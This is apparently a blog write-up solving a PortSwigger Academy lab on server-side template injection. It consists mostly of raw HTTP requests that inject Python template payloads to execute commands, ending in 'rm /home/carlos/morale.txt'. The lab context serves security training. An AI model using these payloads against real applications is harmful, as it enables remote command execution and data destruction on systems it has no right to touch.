Skip to content

chojnowski.it

Port Swigger Basic server side template injection

Port Swigger Basic server side template injection

Basic server-side template injection (code context)¶

Solution¶

POST /login HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=mrGP8bh2Eka7t1GzESouPmKGkUSq0qHD
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=0Hdk0bkrvWU1AYMwEeEgAKRWRIikDYW5&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Change "Preferred name"¶

POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display=user.name&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Put first basic payload¶

Payload: {{4*4}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIOPOST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIOPOST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIOPOST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIOPOST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{4*4}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Confirm that payload works¶

Open website and add comments (I see {{16}})
https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
---
GET /post?postId=4 HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /post/comment HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO&postId=4&comment=test
---
GET /post/comment/confirmation?postId=4 HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/post?postId=4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Second payload¶

Payload: {{__import__('os').system('id')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('id')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Third payload¶

Payload: {{__import__('os').system('ls /home/carlos/morale.txt')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('ls /home/carlos/morale.txt')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Last payload - delete file morale.txt¶

Payload: {{__import__('os').system('rm /home/carlos/morale.txt')}}
---
POST /my-account/change-blog-post-author-display HTTP/2
Host: 0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Cookie: session=HZCa7YSa4dMcp0ZbXPLJE1j0C3E7GLuL
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net
Referer: https://0abe002904a7eaa0805d625c00b80089.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

blog-post-author-display={{__import__('os').system('rm /home/carlos/morale.txt')}}&csrf=SnzbHQ3Sgne5tqOBFeD8RNOOXipPJdIO

Solved¶